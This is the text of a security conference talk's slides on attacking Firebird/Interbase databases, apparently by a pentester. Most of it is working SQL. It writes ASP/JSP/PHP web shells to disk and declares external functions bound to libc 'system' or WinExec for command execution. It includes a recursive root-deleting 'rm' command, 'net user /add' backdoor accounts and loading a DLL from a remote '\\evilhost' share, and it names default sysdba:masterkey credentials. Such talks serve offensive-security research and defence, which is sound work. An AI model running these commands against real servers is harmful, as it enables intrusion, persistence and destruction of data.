Firebird Interbase Database engine hacks or rtfm
Osipov Alexey, @GiftsUngiven
/whoami
• Osipov Alexey
• Web-hacker, pentester, member of SCADAStrangeLove
• PHDays, BlackHat, NoSuchCon speaker
• Developer of different pentesting PoC's
– XML
– MySQL
Twitter: @GiftsUngiven
Why so serious?
• "Pseudo" market shares
– mysql, MSSQL, Oracle, postgresql, …: 99%
– Firebird: 1%
• That means
– mysql, MSSQL, Oracle, postgresql, …: N ways to own them
– Firebird: no ways to own it
Pentesting
• Requirements
– SQLi
• https://forum.antichat.ru/
• https://rdot.org
– Account
• Which is sysdba:masterkey most of the time
• No ways to escape it
– RW filesystem
– Execute
– So..
File creation (part 1)
• Create difference file
– CONNECT '<host>:<existent database>';
– ALTER DATABASE ADD DIFFERENCE FILE 'filename';
– ALTER DATABASE BEGIN BACKUP;
– INSERT INTO TABLE `exploited` VALUES ('<ASP/JSP/PHP shell>');
– COMMIT;
• Your file is locked, so
– EXIT;
File creation (part 2)
• Database creation
– CREATE DATABASE '<host>:<arbitrary non-existent path>';
– CREATE TABLE a ('value' BLOB);
– INSERT INTO a VALUES ('<ASP/JSP/PHP shell>');
– COMMIT;
• Again, your file is locked
– EXIT;
RCE (part 1)
• Main problem is configuration (but sometimes enabled):
• *nix (like in PostgreSQL)
– DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'system' MODULE_NAME '/lib/libc.so';
– SELECT FIRST 1 exec('rm /* -rf') FROM any_table LIMIT 1;
RCE (part 2)
• Windows
– DECLARE EXTERNAL FUNCTION exec cstring(4096), integer RETURNS integer BY VALUE ENTRY_POINT 'WinExec' MODULE_NAME 'c:\windows\system32\kernel32.dll';
– SELECT FIRST 1 exec('net user /add ****', 1) FROM any_table LIMIT 1;
• Kudos to Alexander Tlyapov (@Rigros1)
RCE (part 3)
• Windows
– DECLARE EXTERNAL FUNCTION exec cstring(4096) RETURNS cstring(4096) ENTRY_POINT 'Exec' MODULE_NAME '\\evilhost\share\udf.dll';
– SELECT FIRST 1 exec('net user /add ****') FROM any_table LIMIT 1;
• No NTLM auth on host, so SAMBA with anonymous login only
• Can create any needed function
Questions?
@GiftsUngiven